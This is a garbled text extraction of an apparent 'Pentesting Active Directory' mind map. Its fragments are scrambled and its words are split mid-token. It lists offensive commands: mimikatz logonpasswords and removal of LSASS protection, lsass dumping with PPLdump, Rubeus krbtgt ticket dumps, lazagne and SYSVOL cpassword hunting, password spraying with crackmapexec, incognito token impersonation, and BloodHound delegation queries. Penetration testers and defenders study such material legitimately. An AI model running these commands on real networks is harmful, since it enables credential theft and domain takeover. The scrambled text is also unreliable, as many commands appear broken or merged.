Pentesting Active Directory
Pentesting Active Directory
nmap -sU -sC -sV <ip> # udp scan use scanner/smb/smb_enum_gpp VE-2021-36934 (HiveNightmare/
C PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp Get tickets Rubeus dump /service:krbtgt /nowrap
SeriousSAM)
MS14-025
f indstr /S /I cpassword \\<FQDN>\sysvol\<
imikatz "!+" "!processprotect /process:lsass.
m Rubeus dump /luid:0xdeadbeef /nowrap
FQDN>\policies\*.xml ... LSA as a Protected Process
mcli dev show eth0 # show domain name &
n exe /remove" "privilege::debug" "token::
dns elevate" "sekurlsa::logonpasswords" "!
database credentials use admin/mssql/mssql_enum_sql_logins Get-NetComputer -Unconstrained
processprotect /process:lsass.exe" "!-" #with Unconstrained delegation
slookup -type=SRV _ldap._tcp.dc._msdcs.//
n mimidriver.sys
find AD IP proxylogon et-DomainComputer -Unconstrained -
G
DOMAIN/
Properties DnsHostName
search password files findstr /si 'password' *.txt *.xml *.docx
roxyshell
p Administrator access
ot username but no password
g Get unconstrained delegation machines ATCH (c:Computer {unconstraineddelegation:
M
search stored password lazagne.exe all
dig axfr <domain_name> @<name_server> true}) RETURN c
zone transfert rackmapexec <IP> -u 'user' -p 'password' --
c
klink /d c:\shadowcopy \\?\GLOBALROOT\
m
pass-pol
shadow copies diskshadow list shadows all Device\HarddiskVolumeShadowCopy1\ ATCH (u:User {owned:true}), (c:Computer {
M
Get password policy unconstraineddelegation:true}), p=
enum4linx -u 'username' -p 'password' -P <IP> shortestPath((u)-[*1..]->(c)) RETURN p
.\incognito.exe execute -c "<domain>\<user>"
num4linux -a -u "" -p "" <dc-
e me smb <dc-ip> -u user.txt -p password.txt --
c
.\incognito.exe list_tokens -u powershell.exe
rivilege::debug sekurlsa::tickets /export
p
Password spray token manipulation
ip> && enum4linux -a -u " no-bruteforce # test user=password
se incognito
u impersonate_token <domain>\\<user>
sekurlsa::tickets /export
credentials found
guest" -p "" <dc-ip> me smb <dc-ip> -u user.txt -p password.txt #
c
got an admin access ?
Get tickets Rubeus dump /service:krbtgt /nowrap
multiple test (carrefull of lock policy) dpapi extract
...